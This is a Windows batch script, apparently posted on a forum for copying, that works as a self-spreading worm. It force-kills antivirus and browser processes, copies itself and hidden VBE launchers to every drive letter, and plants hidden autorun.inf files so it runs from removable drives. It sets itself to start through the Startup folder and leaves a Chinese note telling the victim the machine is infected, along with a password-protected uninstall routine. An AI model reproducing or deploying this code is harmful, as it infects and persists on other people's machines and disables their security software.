CODE: [Copy to clipboard]
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
if exist %systemroot%\wataxiwabaka.txt (del %systemroot%\wataxiwabaka.txt&&goto end)
if exist %systemroot%\pujie.txt goto check ELSE goto start
:check
for /f "tokens=2-11 delims==" %%a in (%systemroot%\pujie.txt) do (If "%%a%%b%%c%%d%%e%%f%%g%%h%%i%%j"=="diaonigehi" goto del)
:start
call:course>%systemroot%\course.txt
For /f "eol=: tokens=2* delims==" %%F in (%systemroot%\course.txt) do (taskkill /f /im %%F) >nul 2>nul
For %%F in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do (call:read>%%F\作者的话.txt)>nul 2>nul
For %%F in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do (call:inf>%%F\autorun.inf&attrib +a +s +h +r %%F\autorun.inf)>nul 2>nul
For %%F in (%systemRoot%\ C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do (call:vbe>%%F\%~n0.vbe&attrib +a +s +h +r %%F\%~n0.vbe)>nul 2>nul
copy %~dpnx0 %systemroot%\
For %%F in (C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) do (copy %systemroot%\%~nx0 %%F&&attrib +a +s +h +r %%F\%~xn0)>nul 2>nul
call:vbe2>"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe
start %systemroot%\%~n0.vbe
:vbe2
echo wscript.createobject("wscript.shell").run """%systemroot%\%~nx0"" /start",0
goto:diao>nul 2>nul
:inf
echo.[autorun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\command=wscript.exe %~n0.vbe
echo.shell\explore\command=wscript.exe %~n0.vbe
echo.shell\find\command=wscript.exe %~n0.vbe
goto:diao>nul 2>nul
:vbe
echo wscript.createobject("wscript.shell").run """%~nx0"" /start",0
goto:diao>nul 2>nul
:course
echo course=RarStub.exe
echo course=RavTask.exe
echo course=Ravmon.exe
echo course=Ravmond.exe
::瑞星
echo course=avgas.exe
::AVG
echo course=Kpfwsvc.exe
echo course=kpfw32.exe
echo course=kavpew.exe
::金山
echo course=360shell.exe
::360
echo course=qqdoctor.exe
::QQ医生
echo course=iexplore.exe
::IE
echo course=kmailmon.exe
echo course=kavstart.exe
echo course=kwatch.exe
::金山
goto:diao>nul 2>nul
:read
echo.您好,您的电脑已经中毒.不过不必过分害怕,此病毒并无任何破坏行,只是为了测试代码.如果您无法删除此病毒,请启用本病毒自代的卸载程序.您可以在%systemroot%建立一个名为wataxiwabaka.txt的文档.30秒内会弹出卸载提示.谢谢合作.祝您卸载愉快.
goto:diao>nul 2>nul
:mima
echo.set /p mima="请输入密码按回车确认:"
echo.pause
echo.if "%%mima%%"=="050353210" echo 正确^&^&pause^&^&goto call
echo.echo 错误
echo.pause
echo.goto:exit
echo.:call
echo.call:txt^>^%systemroot%\pujie.txt
echo.:txt
echo.echo 1=d=i=a=o=n=i=g=e=h=i
echo.:exit
echo.exit
goto:diao
:end
echo.@echo off>%systemroot%\mima.bat
call:mima >>%systemroot%\mima.bat
start %systemroot%\mima.bat
start %systemRoot%\%~n0.vbe
exit
:del
FOR %%F in (%systemRoot%\ C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) DO (FOR %%D in (autorun.inf %~nx0 %~n0.vbe) DO attrib -s -h -a -r %%F\%%D)
FOR %%F IN (%systemRoot%\ C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z:) DO (FOR %%D IN (autorun.inf %~nx0 %~n0.vbe 作者的话.txt) DO del %%F\%%D)
del %systemroot%\mima.bat
del %systemroot%\course.txt
del %systemroot%\pujie.txt
del %systemroot%\wataxiwabaka.txt
del /q "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
exit
[